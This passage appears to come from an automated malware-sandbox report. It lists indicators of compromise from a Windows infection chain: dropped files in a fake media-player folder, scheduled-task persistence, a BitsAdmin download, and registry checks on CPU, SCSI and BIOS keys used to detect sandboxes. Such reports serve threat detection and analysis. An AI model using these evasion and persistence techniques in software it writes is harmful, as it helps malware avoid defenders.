(x86)\OsCELDuBOVuk powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\data_load.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\temp_files autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\0 autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe PGyDws9ux3Lc9PjIedgVt2AC.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac autosubplayer.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe PGyDws9ux3Lc9PjIedgVt2AC.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\OsCELDuBOVuk.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe -
Drops file in Windows directory 44 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI423D.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{00CE1E75-E04C-4F83-824D-20B2297C955F} msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI2D1D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI308A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3522.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI41ED.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI2B64.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF396232B045D99CF2.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI421D.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFD473E8D5C9842CF5.TMP msiexec.exe File created C:\Windows\Installer\423c0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2CCD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2CFD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4159.tmp msiexec.exe File opened for modification C:\Windows\Installer\423c3.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI429D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2660.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI30CA.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI34C3.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI4647.tmp msiexec.exe File opened for modification C:\Windows\Installer\423c0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3261.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB6FEE22B7246B222.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI426D.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF8DC7A43B317C3520.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF794AB24A2B264558.TMP msiexec.exe File created C:\Windows\Tasks\OsCELDuBOVuk.job rundll32.exe File opened for modification C:\Windows\Installer\MSI29FB.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI3FE1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4264.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2CAD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI300C.tmp msiexec.exe File created C:\Windows\Installer\423c3.msi msiexec.exe File created C:\Windows\SystemTemp\~DF82D6B7C8E93585B0.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF17502374E2A6836E.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\MSI414F.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF83D5CD65DEBA7D52.TMP msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
pid pid_target Process procid_target 5048 3872 WerFault.exe 91 5244 4544 WerFault.exe 96 5320 1288 WerFault.exe 92 2028 6104 WerFault.exe 131 1488 6040 WerFault.exe 122 1280 4212 WerFault.exe 125 4932 6088 WerFault.exe 133 4776 5244 WerFault.exe 149 6624 864 WerFault.exe 137 7052 3012 WerFault.exe 147 6028 1252 WerFault.exe 274 7160 856 WerFault.exe 278 6360 3240 WerFault.exe 280 3736 1084 WerFault.exe 284 5144 4968 WerFault.exe 287 4276 3132 WerFault.exe 294 1612 5884 WerFault.exe 334 2672 4452 WerFault.exe 277 4796 2216 WerFault.exe 353 5752 6364 WerFault.exe 363 4540 16204 WerFault.exe 383 2276 6128 WerFault.exe 392 5044 4032 WerFault.exe 405 14532 13728 WerFault.exe 486 15276 15136 WerFault.exe 525 16232 1288 WerFault.exe 539 6640 5152 WerFault.exe 542 2072 7816 WerFault.exe 559 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2841347.scr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2841347.scr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2841347.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E804.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E804.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E804.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rPRLfhZmwXu3oXGQaqju2XrO.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rPRLfhZmwXu3oXGQaqju2XrO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Lukykutufu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Lukykutufu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6356 schtasks.exe 6788 schtasks.exe 6780 schtasks.exe 3136 schtasks.exe 7056 schtasks.exe 6816 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 7064 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 8420 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 63 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Lukykutufu.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Lukykutufu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 6796 taskkill.exe 4056 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Process not Found -
